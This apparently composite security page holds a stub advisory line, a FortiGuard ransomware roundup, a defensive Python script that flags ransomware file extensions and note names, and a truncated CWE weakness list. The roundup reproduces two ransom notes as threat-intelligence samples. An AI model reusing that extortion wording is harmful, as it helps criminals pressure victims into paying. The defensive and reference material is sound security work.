This vulnerability allows remote attackers to disclose sensitive information on affected installations of KeySight N6841A RF Sensor. Authentication is not required to exploit this vulnerability.
Ransomware Roundup – 2022/05/26
FortiGuard Labs became aware of a number of new ransomware strains for the week of May 23rd, 2022. It is imperative to raise awareness about new ransomware, as infections can cause severe damage to the affected machines and organizations. This Threat Signal covers Yashma ransomware, GoodWill ransomware and Horsemagyar ransomware, along with Fortinet protections against them.

What is Yashma Ransomware?

Yashma ransomware is new and is generated through the Yashma ransomware builder, which is claimed to be the sixth version of the Chaos ransomware builder. Reportedly, compared to the fifth version, the Yashma ransomware builder now supports a “forbidden country” option, which lets attackers choose not to run the generated ransomware based on the victim’s location. The new builder also enables the ransomware to stop a wide variety of services running on the compromised machine, such as anti-malware solutions and Remote Desktop and Backup services. Additionally, it is important to note that from the fifth version of the Chaos ransomware builder onward, the crafted ransomware can successfully encrypt files larger than 2,117,152 bytes and no longer corrupts them.

A known sample of Yashma ransomware has the following ransom note:

All of your files have been encrypted with Yashma ransomware
Your computer was infected with a ransomware. Your files have been encrypted and you won’t
be able to decrypt them without our help.
What can I do to get my files back?
You can buy our special decryption software, this software will allow you to recover all of your data and remove the ransomware from your computer.
The price for the software is $1,500. Payment can be made in Bitcoin only.
How do I pay, where do I get Bitcoin?
Purchasing Bitcoin varies from country to country, you are best advised to do a quick google search yourself to find out how to buy Bitcoin.
Many of our customers have reported these sites to be fast and reliable:
Coinmama – hxxps://www[.]coinmama[.]com
Bitpanda – hxxps://www[.]bitpanda[.]com
Payment information
Amount: 0.1473766 BTC
Bitcoin Address: [removed]

At the time of this writing, the attacker’s bitcoin wallet has no transactions.

FortiGuard Labs previously released several blogs on Chaos ransomware. See the Appendix for links to “Chaos Ransomware Variant Sides with Russia” and “Chaos Ransomware Variant in Fake Minecraft Alt List Brings Destruction to Japanese Gamers”.

What is the Status of Coverage for Yashma Ransomware?

FortiGuard Labs provides the following AV coverage against a known sample of Yashma ransomware:
MSIL/Filecoder.APU!tr.ransom

What is GoodWill Ransomware?

GoodWill ransomware was recently discovered; however, it appears to have been first observed in March 2022. The ransomware encrypts files on the compromised machine and adds a “.gdwill” file extension to the affected files.

Unlike other ransomware that demands a ransom to recover the encrypted files, GoodWill asks the victim to do three good deeds. Firstly, the victim must provide clothes and blankets to needy people on the street. Secondly, the victim must feed dinner to five children at a pizza or fried chicken joint. Lastly, the victim must visit a local hospital and provide financial assistance to those in need. After finishing each deed, proof must be provided to the attacker, and a decryption tool and video instructions will be provided to the victim after completing all the deeds.

What is the Status of Coverage for GoodWill Ransomware?

FortiGuard Labs provides the following AV coverage against GoodWill ransomware:
MSIL/Filecoder.AGR!tr.ransom

What is Horsemagyar Ransomware?

Horsemagyar ransomware is a newly discovered variant of Sojusz ransomware. It encrypts files on the compromised machine and adds a “.[10 digit ID number].spanielearslook.likeoldboobs” file extension to the encrypted files. The ransomware leaves a ransom note named Horse.txt. The first sighting of Sojusz ransomware goes back to February 2022, when it added a “.[10 digit ID number].[attacker’s email address].bec” extension to the files it encrypted.

An example of the ransom note left behind by Horsemagyar ransomware is below:

::: Hello my dear friend :::
Unfortunately for you, a major IT security weakness left you open to attack, your files have been encrypted
If you want to restore them, write to our skype – [removed] DECRYPTION
Also you can write ICQ live chat which works 24/7 @[removed]
Install ICQ software on your PC https://icq[.]com/windows/ or on your mobile phone search in Appstore / Google market ICQ
Write to our ICQ @HORSEMAGYAR https://icq[.]im/[removed]
If we not reply in 6 hours you can write to our mail but use it only if previous methods not working – [removed]@onionmail.org
Attention!
* Do not rename encrypted files.
* Do not try to decrypt your data using third party software, it may cause permanent data loss.
* We are always ready to cooperate and find the best way to solve your problem.
* The faster you write, the more favorable the conditions will be for you.
* Our company values its reputation. We give all guarantees of your files decryption, such as test decryption some of them
We respect your time and waiting for respond from your side
tell your MachineID: MAHINE_ID and LaunchID: LAUNCH__ID
Sensitive data on your system was DOWNLOADED.
If you DON’T WANT your sensitive data to be PUBLISHED you have to act quickly.
Data includes:
- Employees personal data, CVs, DL, SSN.
- Complete network map including credentials for local and remote services.
- Private financial information including: clients data, bills, budgets, annual reports, bank statements.
- Manufacturing documents including: datagrams, schemas, drawings in solidworks format
- And more…

What is the Status of Coverage against Horsemagyar Ransomware?

FortiGuard Labs provides the following AV coverage against Horsemagyar ransomware:
W32/Filecoder.NSF!tr.ransom

Anything Else to Note?

Victims of ransomware are cautioned against paying ransoms by organizations such as CISA, NCSC, the FBI, and HHS. Payment does not guarantee files will be recovered. It may also embolden adversaries to target additional organizations, encourage other criminal actors to engage in the distribution of ransomware, and/or fund illicit activities, which could potentially be illegal according to a U.S. Department of the Treasury Office of Foreign Assets Control (OFAC) advisory.
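The file-system artifacts named in this Threat Signal (the “.gdwill” extension, the “.[10 digit ID].spanielearslook.likeoldboobs” and “.[10 digit ID].[attacker’s email].bec” extensions, and the Horse.txt note) are the kind of indicator an incident responder sweeps a file listing for. The triage routine below is an added, defender-side example and is not code from the Fortinet post; it treats the ten-digit ID and the attacker e-mail as variable parts matched by shape rather than as literals, examines only the final path component, and reports which family each hit corresponds to. The sample listing is constructed.

```python
import re
from collections import defaultdict
from typing import Dict, List, Optional

# Indicator patterns built from the file extensions and ransom-note name described
# in the Threat Signal above. The ten-digit victim ID varies per infection, so it is
# matched as \d{10} instead of a literal; the attacker e-mail in the Sojusz extension
# is likewise matched only by shape (local-part@domain).
INDICATORS = [
    ("GoodWill", re.compile(r"\.gdwill$", re.IGNORECASE)),
    ("Horsemagyar", re.compile(r"\.\d{10}\.spanielearslook\.likeoldboobs$", re.IGNORECASE)),
    ("Sojusz", re.compile(r"\.\d{10}\.[^\\/@]+@[^\\/@]+\.bec$", re.IGNORECASE)),
]

# Ransom-note file names (lower-cased) mapped to the family that drops them.
NOTE_FILENAMES = {"horse.txt": "Horsemagyar"}


def classify_path(path: str) -> Optional[str]:
    """Return the ransomware family whose indicator the file name matches, or None.

    Only the final path component is examined, and both '/' and '\\' are accepted
    as separators so Windows and POSIX listings can be fed in unchanged.
    """
    name = re.split(r"[\\/]", path)[-1]
    note_family = NOTE_FILENAMES.get(name.lower())
    if note_family:
        return note_family
    for family, pattern in INDICATORS:
        if pattern.search(name):
            return family
    return None


def triage(paths: List[str]) -> Dict[str, List[str]]:
    """Group every matching path by family; paths with no indicator are dropped."""
    hits: Dict[str, List[str]] = defaultdict(list)
    for path in paths:
        family = classify_path(path)
        if family is not None:
            hits[family].append(path)
    return dict(hits)


# Constructed sample listing (not taken from the original post).
SAMPLE_PATHS = [
    r"C:\Users\alice\Documents\budget.xlsx.1234567890.spanielearslook.likeoldboobs",
    r"C:\Users\alice\Documents\Horse.txt",
    "/srv/share/report.docx.gdwill",
    "/srv/share/notes.txt.0987654321.contact@example.com.bec",
    "/srv/share/readme.txt",                                 # clean file
    "/srv/share/archive.gdwill.bak",                         # extension not last: must not match
    "/srv/share/x.123456789.spanielearslook.likeoldboobs",   # 9-digit ID: must not match
]

if __name__ == "__main__":
    for family, files in sorted(triage(SAMPLE_PATHS).items()):
        print(f"{family}: {len(files)} artifact(s)")
        for f in files:
            print("   ", f)
```

Anchoring every pattern at the end of the name keeps a backup copy such as archive.gdwill.bak from being counted, and requiring exactly ten digits avoids matching ordinary dotted version strings; extending the table with the AV signature names above is not useful here, since those identify the binary, not the files it leaves behind.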
CWE
CWE (Common Weakness Enumeration) is a list of common types of hardware and software defects that have security implications. The CWE list can be used as a framework to describe and communicate such vulnerabilities in terms of CWE identifiers.
The goal is to support methods (including automated ones) for controlling and preventing software errors. It can be used at the development stage, during code review, and later during penetration testing to classify and communicate the vulnerability type to developers. The system is at version 4.7 and contains over 600 categories of weaknesses and vulnerabilities.
The CWE Top 25 Most Dangerous Software Weaknesses list is a list of the most common programming errors that can lead to software vulnerabilities. Vulnerabilities present in the CWE Top 25 are usually easy to detect and exploit. For example, CWE-79 is related to Cross-Site Scripting, while CWE-89 is related to SQL Injection. A similar project is the OWASP (Open Web Application Security Project) Top Ten. Compared to the CWE Top 25, the OWASP Top Ten focuses solely on vulnerabilities of web applications.
The CWE Most Important Hardware Weaknesses list serves the same purpose, but it focuses on hardware defects.
Please check our post about Vulnerability Analysis to learn more about CWE usage.
A list of all the CWEs follows.
- CWE-40 – Path Traversal: '\\UNC\share\name' (Windows UNC Share)
  Description: An attacker can inject a Windows UNC share ('\\UNC\share\name') into a software system to potentially redirect access to an unintended location or arbitrary file.
  Modes of Introduction: Implementation
  Related Weaknesses: CWE-36
  Consequences: Confidentiality, Integrity: Read Files or Directories, Modify Files or Directories
  Potential Mitigations: Phase: Implementation; Effectiveness: High; Description: …
- CWE-400 – Uncontrolled Resource Consumption
  Description: The software does not properly control the allocation and maintenance of a limited resource, thereby enabling an actor to influence the amount of resources consumed, eventually leading to the exhaustion of available resources.
  Modes of Introduction: Operation
  Likelihood of Exploit: High
  Related Weaknesses: CWE-664
  Consequences: Availability: DoS: Crash, Exit, or…
- CWE-356 – Product UI does not Warn User of Unsafe Actions
  Description: The software’s user interface does not warn the user before undertaking an unsafe action on behalf of that user. This makes it easier for attackers to trick users into inflicting damage to their system. Software systems should warn users that a potentially dangerous action may occur if the user proceeds. For example, if the…
- CWE-357 – Insufficient UI Warning of Dangerous Operations
  Description: The user interface provides a warning to a user regarding dangerous or sensitive operations, but the warning is not noticeable enough to warrant attention.
  Modes of Introduction: Architecture and Design
  Related Weaknesses: CWE-693
  Consequences: Non-Repudiation: Hide Activities
  CVE References: CVE-2007-1099 User not sufficiently warned if host key…
- CWE-358 – Improperly Implemented Security Check for Standard
  Description: The software does not implement or incorrectly implements one or more security-relevant checks as specified by the design of a standardized algorithm, protocol, or technique.
  Modes of Introduction: Architecture and Design
  Related Weaknesses: CWE-573, CWE-693, CWE-345, CWE-290
  Consequences: Access Control: Bypass Protection Mechanism
  CVE References: CVE-2002-0862 Browser…
- CWE-36 – Absolute Path Traversal
  Description: The software uses external input to construct a pathname that should be within a restricted directory, but it does not properly neutralize absolute path sequences such as “/abs/path” that can resolve to a location that is outside of that directory. This allows attackers to traverse the file system to access files or directories that…
- CWE-360 – Trust of System Event Data
  Description: Security based on event locations is insecure and can be spoofed. Events are a messaging system which may provide control data to programs listening for events. Events often do not have any type of authentication framework to allow them to be verified from a trusted source. Any application, in Windows, on a given desktop…
- CWE-362 – Concurrent Execution using Shared Resource with Improper Synchronization (‘Race Condition’)
  Description: The program contains a code sequence that can run concurrently with other code, and the code sequence requires temporary, exclusive access to a shared resource, but a timing window exists in which the shared resource can be modified by another code sequence that is operating concurrently.
  Modes of Introduction: Architecture and Design …
- CWE-363 – Race Condition Enabling Link Following
  Description: The software checks the status of a file or directory before accessing it, which produces a race condition in which the file can be replaced with a link before the access is performed, causing the software to access the wrong file. While developers might expect that there is a very narrow time window between…
- CWE-364 – Signal Handler Race Condition
  Description: The software uses a signal handler that introduces a race condition.
  Modes of Introduction: Architecture and Design
  Likelihood of Exploit: Medium
  Related Weaknesses: CWE-362, CWE-415, CWE-416, CWE-123
  Consequences: Integrity, Confidentiality, Availability: Modify Application Data, Modify Memory, DoS: Crash, Exit, or Restart, Execute Unauthorized Code or Commands. It may be possible…
- CWE-365 – DEPRECATED: Race Condition in Switch
  Description: This entry has been deprecated. There are no documented cases in which a switch’s control expression is evaluated more than once. It is likely that this entry was initially created based on a misinterpretation of the original source material. The original source intended to explain how switches could be unpredictable when using threads, if…
- CWE-366 – Race Condition within a Thread
  Description: If two threads of execution use a resource simultaneously, there exists the possibility that resources may be used while invalid, in turn making the state of execution undefined.
  Modes of Introduction: Architecture and Design
  Likelihood of Exploit: Medium
  Related Weaknesses: CWE-362, CWE-662
  Consequences: Integrity, Other: Alter Execution Logic, Unexpected…
- CWE-367 – Time-of-check Time-of-use (TOCTOU) Race Condition
  Description: The software checks the state of a resource before using that resource, but the resource’s state can change between the check and the use in a way that invalidates the results of the check. This can cause the software to perform invalid actions when the resource is in an unexpected state. This weakness can…
- CWE-368 – Context Switching Race Condition
  Description: A product performs a series of non-atomic actions to switch between contexts that cross privilege or other security boundaries, but a race condition allows an attacker to modify or misrepresent the product’s behavior during the switch. This is commonly seen in web browser vulnerabilities in which the attacker can perform certain actions while the…
- CWE-369 – Divide By Zero
  Description: The product divides a value by zero. This weakness typically occurs when an unexpected value is provided to the product, or if an error occurs that is not properly detected. It frequently occurs in calculations involving physical dimensions such as size, length, width, and height.
  Modes of Introduction: Implementation
  Likelihood of Exploit: …
- CWE-37 – Path Traversal: '/absolute/pathname/here'
  Description: A software system that accepts input in the form of a slash absolute path ('/absolute/pathname/here') without appropriate validation can allow an attacker to traverse the file system to unintended locations or access arbitrary files.
  Modes of Introduction: Implementation
  Related Weaknesses: CWE-36, CWE-160
  Consequences: Confidentiality, Integrity: Read Files or Directories, Modify…
- CWE-370 – Missing Check for Certificate Revocation after Initial Check
  Description: The software does not check the revocation status of a certificate after its initial revocation check, which can cause the software to perform privileged actions even after the certificate is revoked at a later time. If the revocation status of a certificate is not checked before each action that requires privileges, the system may…
- CWE-372 – Incomplete Internal State Distinction
  Description: The software does not properly determine which state it is in, causing it to assume it is in state X when in fact it is in state Y, causing it to perform incorrect operations in a security-relevant manner.
  Modes of Introduction: Architecture and Design
  Related Weaknesses: CWE-664
  Consequences: Integrity, Other:…
- CWE-373 – DEPRECATED: State Synchronization Error
  Description: This entry was deprecated because it overlapped the same concepts as race condition (CWE-362) and Improper Synchronization (CWE-662).
- CWE-374 – Passing Mutable Objects to an Untrusted Method
  Description: The program sends non-cloned mutable data as an argument to a method or function. The function or method that has been called can alter or delete the mutable data. This could violate assumptions that the calling function has made about its state. In situations where unknown code is called with references to mutable data,…
- CWE-375 – Returning a Mutable Object to an Untrusted Caller
  Description: Sending non-cloned mutable data as a return value may result in that data being altered or deleted by the calling function. In situations where functions return references to mutable data, it is possible that the external code which called the function may make changes to the data sent. If this data was not previously…
- CWE-337 – Predictable Seed in Pseudo-Random Number Generator (PRNG)
  Description: A Pseudo-Random Number Generator (PRNG) is initialized from a predictable seed, such as the process ID or system time. The use of predictable seeds significantly reduces the number of possible seeds that an attacker would need to test in order to predict which random numbers will be generated by the PRNG.
  Modes of Introduction: …
- CWE-338 – Use of Cryptographically Weak Pseudo-Random Number Generator (PRNG)
  Description: The product uses a Pseudo-Random Number Generator (PRNG) in a security context, but the PRNG’s algorithm is not cryptographically strong.
  Modes of Introduction: Architecture and Design
  Likelihood of Exploit: Medium
  Related Weaknesses: CWE-330
  Consequences: Access Control: Bypass Protection Mechanism. If a PRNG is used for authentication and authorization, such…
- CWE-339 – Small Seed Space in PRNG
  Description: A Pseudo-Random Number Generator (PRNG) uses a relatively small seed space, which makes it more susceptible to brute force attacks. PRNGs are entirely deterministic once seeded, so it should be extremely difficult to guess the seed. If an attacker can collect the outputs of a PRNG and then brute force the seed by trying…
- CWE-34 – Path Traversal: '....//'
  Description: The software uses external input to construct a pathname that should be within a restricted directory, but it does not properly neutralize '....//' (doubled dot dot slash) sequences that can resolve to a location that is outside of that directory.
  Modes of Introduction: Implementation
  Related Weaknesses: CWE-23
  Consequences: Confidentiality, Integrity:…
- CWE-340 – Generation of Predictable Numbers or Identifiers
  Description: The product uses a scheme that generates numbers or identifiers that are more predictable than required.
  Modes of Introduction: Architecture and Design
  Related Weaknesses: CWE-330
  Consequences: Other: Varies by Context
- CWE-341 – Predictable from Observable State
  Description: A number or object is predictable based on observations that the attacker can make about the state of the system or network, such as time, process ID, etc.
  Modes of Introduction: Architecture and Design
  Related Weaknesses: CWE-340
  Consequences: Other: Varies by Context. This weakness could be exploited by an attacker…
- CWE-342 – Predictable Exact Value from Previous Values
  Description: An exact value or random number can be precisely predicted by observing previous values.
  Modes of Introduction: Architecture and Design
  Related Weaknesses: CWE-340
  Consequences: Other: Varies by Context
  Potential Mitigations: Increase the entropy used to seed a PRNG. Phase: Architecture and Design, Requirements: Use products or…
- CWE-343 – Predictable Value Range from Previous Values
  Description: The software’s random number generator produces a series of values which, when observed, can be used to infer a relatively small range of possibilities for the next value that could be generated. The output of a random number generator should not be predictable based on observations of previous values. In some cases, an attacker…
- CWE-344 – Use of Invariant Value in Dynamically Changing Context
  Description: The product uses a constant value, name, or reference, but this value can (or should) vary across different environments.
  Modes of Introduction: Architecture and Design
  Related Weaknesses: CWE-330
  Consequences: Other: Varies by Context
  CVE References: CVE-2002-0980 Component for web browser writes an error message to a known…
- CWE-345 – Insufficient Verification of Data Authenticity
  Description: The software does not sufficiently verify the origin or authenticity of data, in a way that causes it to accept invalid data.
  Modes of Introduction: Architecture and Design
  Related Weaknesses: CWE-693
  Consequences: Integrity, Other: Varies by Context, Unexpected State
- CWE-346 – Origin Validation Error
  Description: The software does not properly verify that the source of data or communication is valid.
  Modes of Introduction: Architecture and Design
  Related Weaknesses: CWE-345, CWE-284
  Consequences: Access Control, Other: Gain Privileges or Assume Identity, Varies by Context. An attacker can access any functionality that is inadvertently accessible to the…
- CWE-347 – Improper Verification of Cryptographic Signature
  Description: The software does not verify, or incorrectly verifies, the cryptographic signature for data.
  Modes of Introduction: Architecture and Design
  Related Weaknesses: CWE-345
  Consequences: Access Control, Integrity, Confidentiality: Gain Privileges or Assume Identity, Modify Application Data, Execute Unauthorized Code or Commands. An attacker could gain access to sensitive data and…
- CWE-348 – Use of Less Trusted Source
  Description: The software has two different sources of the same data or information, but it uses the source that has less support for verification, is less trusted, or is less resistant to attack.
  Modes of Introduction: Architecture and Design
  Related Weaknesses: CWE-345
  Consequences: Access Control: Bypass Protection Mechanism, Gain Privileges or…
- CWE-349 – Acceptance of Extraneous Untrusted Data With Trusted Data
  Description: The software, when processing trusted data, accepts any untrusted data that is also included with the trusted data, treating the untrusted data as if it were trusted.
  Modes of Introduction: Architecture and Design
  Related Weaknesses: CWE-345
  Consequences: Access Control, Integrity: Bypass Protection Mechanism, Modify Application Data. An attacker could package…
- CWE-35 – Path Traversal: '.../...//'
  Description: The software uses external input to construct a pathname that should be within a restricted directory, but it does not properly neutralize '.../...//' (doubled triple dot slash) sequences that can resolve to a location that is outside of that directory.
  Modes of Introduction: Implementation
  Related Weaknesses: CWE-23
  Consequences: Confidentiality, Integrity:…
- CWE-350 – Reliance on Reverse DNS Resolution for a Security-Critical Action
  Description: The software performs reverse DNS resolution on an IP address to obtain the hostname and make a security decision, but it does not properly ensure that the IP address is truly associated with the hostname.
  Modes of Introduction: Architecture and Design
  Related Weaknesses: CWE-290, CWE-923, CWE-807
  Consequences: Access Control:…
- CWE-351 – Insufficient Type Distinction
  Description: The software does not properly distinguish between different types of elements in a way that leads to insecure behavior.
  Modes of Introduction: Implementation
  Related Weaknesses: CWE-345, CWE-436
  Consequences: Other: Other
  CVE References: CVE-2005-2260 Browser user interface does not distinguish between user-initiated and synthetic events. CVE-2005-2801 Product does…
- CWE-352 – Cross-Site Request Forgery (CSRF)
  Description: The web application does not, or can not, sufficiently verify whether a well-formed, valid, consistent request was intentionally provided by the user who submitted the request. When a web server is designed to receive a request from a client without any mechanism for verifying that it was intentionally sent, then it might be possible…
- CWE-353 – Missing Support for Integrity Check
  Description: The software uses a transmission protocol that does not include a mechanism for verifying the integrity of the data during transmission, such as a checksum. If integrity check values or “checksums” are omitted from a protocol, there is no way of determining if data has been corrupted in transmission. The lack of checksum functionality…
- CWE-354 – Improper Validation of Integrity Check Value
  Description: The software does not validate or incorrectly validates the integrity check values or “checksums” of a message. This may prevent it from detecting if the data has been modified or corrupted in transmission. Improper validation of checksums before use results in an unnecessary risk that can easily be mitigated. The protocol specification describes the…
- CWE-318 – Cleartext Storage of Sensitive Information in Executable
  Description: The application stores sensitive information in cleartext in an executable. Attackers can reverse engineer binary code to obtain secret data. This is especially easy when the cleartext is plain ASCII. Even if the information is encoded in a way that is not human-readable, certain techniques could determine which encoding is being used, then decode…
- CWE-319 – Cleartext Transmission of Sensitive Information
  Description: The software transmits sensitive or security-critical data in cleartext in a communication channel that can be sniffed by unauthorized actors. Many communication channels can be “sniffed” by attackers during data transmission. For example, network traffic can often be sniffed by any attacker who has access to a network interface. This significantly lowers the difficulty…
- CWE-32 – Path Traversal: '...' (Triple Dot)
  Description: The software uses external input to construct a pathname that should be within a restricted directory, but it does not properly neutralize '...' (triple dot) sequences that can resolve to a location that is outside of that directory.
  Modes of Introduction: Implementation
  Related Weaknesses: CWE-23
  Consequences: Confidentiality, Integrity: Read Files…
- CWE-321 – Use of Hard-coded Cryptographic Key
  Description: The use of a hard-coded cryptographic key significantly increases the possibility that encrypted data may be recovered.
  Modes of Introduction: Architecture and Design
  Likelihood of Exploit: High
  Related Weaknesses: CWE-798
  Consequences: Access Control: Bypass Protection Mechanism, Gain Privileges or Assume Identity. If hard-coded cryptographic keys are used, it…
- CWE-322 – Key Exchange without Entity Authentication
  Description: The software performs a key exchange with an actor without verifying the identity of that actor. Performing a key exchange will preserve the integrity of the information sent between two entities, but this will not guarantee that the entities are who they claim they are. This may enable an attacker to impersonate an actor…
- CWE-323 – Reusing a Nonce, Key Pair in Encryption
  Description: Nonces should be used for the present occasion and only once. Nonces are often bundled with a key in a communication exchange to produce a new session key for each exchange.
  Modes of Introduction: Architecture and Design
  Likelihood of Exploit: High
  Related Weaknesses: CWE-344
  Consequences: Access Control: Bypass Protection Mechanism,…
- CWE-324 – Use of a Key Past its Expiration Date
  Description: The product uses a cryptographic key or password past its expiration date, which diminishes its safety significantly by increasing the timing window for cracking attacks against that key. While the expiration of keys does not necessarily ensure that they are compromised, it is a significant concern that keys which remain in use for prolonged…
- CWE-325 – Missing Cryptographic Step
  Description: The product does not implement a required step in a cryptographic algorithm, resulting in weaker encryption than advertised by the algorithm.
  Modes of Introduction: Implementation
  Related Weaknesses: CWE-573, CWE-358
  Consequences: Access Control: Bypass Protection Mechanism; Confidentiality, Integrity: Read Application Data, Modify Application Data; Accountability, Non-Repudiation: Hide Activities
  Potential Mitigations: …
- CWE-326 – Inadequate Encryption Strength
  Description: The software stores or transmits sensitive data using an encryption scheme that is theoretically sound, but is not strong enough for the level of protection required. A weak encryption scheme can be subjected to brute force attacks that have a reasonable chance of succeeding using current attack methods and resources.
  Modes of Introduction: …
- CWE-327 – Use of a Broken or Risky Cryptographic Algorithm
  Description: The use of a broken or risky cryptographic algorithm is an unnecessary risk that may result in the exposure of sensitive information. The use of a non-standard algorithm is dangerous because a determined attacker may be able to break the algorithm and compromise whatever data has been protected. Well-known techniques may exist to break…
- CWE-328 – Use of Weak Hash
  Description: The product uses an algorithm that produces a digest (output value) that does not meet security expectations for a hash function that allows an adversary to reasonably determine the original input (preimage attack), find another input that can produce the same hash (2nd preimage attack), or find multiple inputs that evaluate to the same…
- CWE-329 – Generation of Predictable IV with CBC Mode
  Description: The product generates and uses a predictable Initialization Vector (IV) with Cipher Block Chaining (CBC) Mode, which causes algorithms to be susceptible to dictionary attacks when they are encrypted under the same key.
  Modes of Introduction: Architecture and Design
  Likelihood of Exploit: Medium
  Related Weaknesses: CWE-1204, CWE-573
  Consequences: Confidentiality: Read…
- CWE-33 – Path Traversal: '....' (Multiple Dot)
  Description: The software uses external input to construct a pathname that should be within a restricted directory, but it does not properly neutralize '....' (multiple dot) sequences that can resolve to a location that is outside of that directory.
  Modes of Introduction: Implementation
  Related Weaknesses: CWE-23
  Consequences: Confidentiality, Integrity: Read Files…
- CWE-330 – Use of Insufficiently Random Values
  Description: The software uses insufficiently random numbers or values in a security context that depends on unpredictable numbers. When software generates predictable values in a context requiring unpredictability, it may be possible for an attacker to guess the next value that will be generated, and use this guess to impersonate another user or access sensitive…
- CWE-331 – Insufficient Entropy
  Description: The software uses an algorithm or scheme that produces insufficient entropy, leaving patterns or clusters of values that are more likely to occur than others.
  Modes of Introduction: Architecture and Design
  Related Weaknesses: CWE-330
  Consequences: Access Control, Other: Bypass Protection Mechanism, Other. An attacker could guess the random numbers…
- CWE-332 – Insufficient Entropy in PRNG
  Description: The lack of entropy available for, or used by, a Pseudo-Random Number Generator (PRNG) can be a stability and security threat.
  Modes of Introduction: Architecture and Design
  Likelihood of Exploit: Medium
  Related Weaknesses: CWE-331
  Consequences: Availability: DoS: Crash, Exit, or Restart. If a pseudo-random number generator is using a limited…
- CWE-333 – Improper Handling of Insufficient Entropy in TRNG
  Description: True random number generators (TRNG) generally have a limited source of entropy and therefore can fail or block. The rate at which true random numbers can be generated is limited. It is important that one uses them only when they are needed for security.
  Modes of Introduction: Architecture and Design
  Likelihood of…
- CWE-334 – Small Space of Random Values
  Description: The number of possible random values is smaller than needed by the product, making it more susceptible to brute force attacks.
  Modes of Introduction: Architecture and Design
  Related Weaknesses: CWE-330
  Consequences: Access Control, Other: Bypass Protection Mechanism, Other. An attacker could easily guess the values used. This could lead to…
- CWE-335 – Incorrect Usage of Seeds in Pseudo-Random Number Generator (PRNG)
  Description: The software uses a Pseudo-Random Number Generator (PRNG) but does not correctly manage seeds.
  Modes of Introduction: Architecture and Design
  Related Weaknesses: CWE-330
  Consequences: Access Control, Other: Bypass Protection Mechanism, Other. If a PRNG is used incorrectly, such as using the same seed for each initialization or using a…
-
CWE-336 – Same Seed in Pseudo-Random Number Generator (PRNG)
Description A Pseudo-Random Number Generator (PRNG) uses the same seed each time the product is initialized. Given the deterministic nature of PRNGs, using the same seed for each initialization will lead to the same output in the same order. If an attacker can guess (or knows) the seed, then the attacker may be able to…
-
CWE-299 – Improper Check for Certificate Revocation
Description The software does not check or incorrectly checks the revocation status of a certificate, which may cause it to use a certificate that has been compromised. An improper check for certificate revocation is a far more serious flaw than related certificate failures. This is because the use of any revoked certificate is almost certainly…
-
CWE-30 – Path Traversal: ‘dir\..\filename’
Description The software uses external input to construct a pathname that should be within a restricted directory, but it does not properly neutralize ‘dir\..\filename’ (leading backslash dot dot) sequences that can resolve to a location that is outside of that directory. Modes of Introduction: – Implementation Related Weaknesses CWE-23 Consequences Confidentiality, Integrity:…
-
CWE-300 – Channel Accessible by Non-Endpoint
Description The product does not adequately verify the identity of actors at both ends of a communication channel, or does not adequately ensure the integrity of the channel, in a way that allows the channel to be accessed or influenced by an actor that is not an endpoint. In order to establish secure communication between…
-
CWE-301 – Reflection Attack in an Authentication Protocol
Description Simple authentication protocols are subject to reflection attacks if a malicious user can use the target machine to impersonate a trusted user. Modes of Introduction: – Architecture and Design Likelihood of Exploit: Medium Related Weaknesses CWE-287 CWE-327 Consequences Access Control: Gain Privileges or Assume Identity The primary result of reflection attacks…
-
CWE-302 – Authentication Bypass by Assumed-Immutable Data
Description The authentication scheme or implementation uses key data elements that are assumed to be immutable, but can be controlled or modified by the attacker. Modes of Introduction: – Architecture and Design Related Weaknesses CWE-287 CWE-807 Consequences Access Control: Bypass Protection Mechanism Potential Mitigations Phase: Architecture and Design, Operation, Implementation Description: …
-
CWE-303 – Incorrect Implementation of Authentication Algorithm
Description The requirements for the software dictate the use of an established authentication algorithm, but the implementation of the algorithm is incorrect. This incorrect implementation may allow authentication to be bypassed. Modes of Introduction: – Implementation Related Weaknesses CWE-287 Consequences Access Control: Bypass Protection Mechanism Potential Mitigations CVE References CVE-2003-0750 Conditional…
-
CWE-304 – Missing Critical Step in Authentication
Description The software implements an authentication technique, but it skips a step that weakens the technique. Authentication techniques should follow the algorithms that define them exactly, otherwise authentication can be bypassed or more easily subjected to brute force attacks. Modes of Introduction: – Architecture and Design Related Weaknesses CWE-287 CWE-573 Consequences Access…
-
CWE-305 – Authentication Bypass by Primary Weakness
Description The authentication algorithm is sound, but the implemented mechanism can be bypassed as the result of a separate weakness that is primary to the authentication error. Modes of Introduction: – Architecture and Design Related Weaknesses CWE-287 Consequences Access Control: Bypass Protection Mechanism Potential Mitigations CVE References CVE-2002-1374 The provided password…
-
CWE-306 – Missing Authentication for Critical Function
Description The software does not perform any authentication for functionality that requires a provable user identity or consumes a significant amount of resources. Modes of Introduction: – Architecture and Design Likelihood of Exploit: High Related Weaknesses CWE-287 CWE-287 Consequences Access Control, Other: Gain Privileges or Assume Identity, Other Exposing critical functionality essentially…
-
CWE-307 – Improper Restriction of Excessive Authentication Attempts
Description The software does not implement sufficient measures to prevent multiple failed authentication attempts within a short time frame, making it more susceptible to brute force attacks. Modes of Introduction: – Architecture and Design Related Weaknesses CWE-287 CWE-287 CWE-799 Consequences Access Control: Bypass Protection Mechanism An attacker could perform an arbitrary…
-
CWE-308 – Use of Single-factor Authentication
Description The use of single-factor authentication can lead to unnecessary risk of compromise when compared with the benefits of a dual-factor authentication scheme. While the use of multiple authentication schemes is simply piling on more complexity on top of authentication, it is inestimably valuable to have such measures of redundancy. The use of weak, reused,…
-
CWE-309 – Use of Password System for Primary Authentication
Description The use of password systems as the primary means of authentication may be subject to several flaws or shortcomings, each reducing the effectiveness of the mechanism. Password systems are the simplest and most ubiquitous authentication mechanisms. However, they are subject to such well-known attacks, and such frequent compromise, that their use in the most…
-
CWE-31 – Path Traversal: ‘dir\..\..\filename’
Description The software uses external input to construct a pathname that should be within a restricted directory, but it does not properly neutralize ‘dir\..\..\filename’ (multiple internal backslash dot dot) sequences that can resolve to a location that is outside of that directory. Modes of Introduction: – Implementation Related Weaknesses CWE-23 Consequences Confidentiality,…
-
CWE-311 – Missing Encryption of Sensitive Data
Description The software does not encrypt sensitive or critical information before storage or transmission. The lack of proper data encryption passes up the guarantees of confidentiality, integrity, and accountability that properly implemented encryption conveys. Modes of Introduction: – Architecture and Design Likelihood of Exploit: High Related Weaknesses CWE-693 Consequences Confidentiality: Read Application…
-
CWE-312 – Cleartext Storage of Sensitive Information
Description The application stores sensitive information in cleartext within a resource that might be accessible to another control sphere. Because the information is stored in cleartext, attackers could potentially read it. Even if the information is encoded in a way that is not human-readable, certain techniques could determine which encoding is being used, then decode…
-
CWE-313 – Cleartext Storage in a File or on Disk
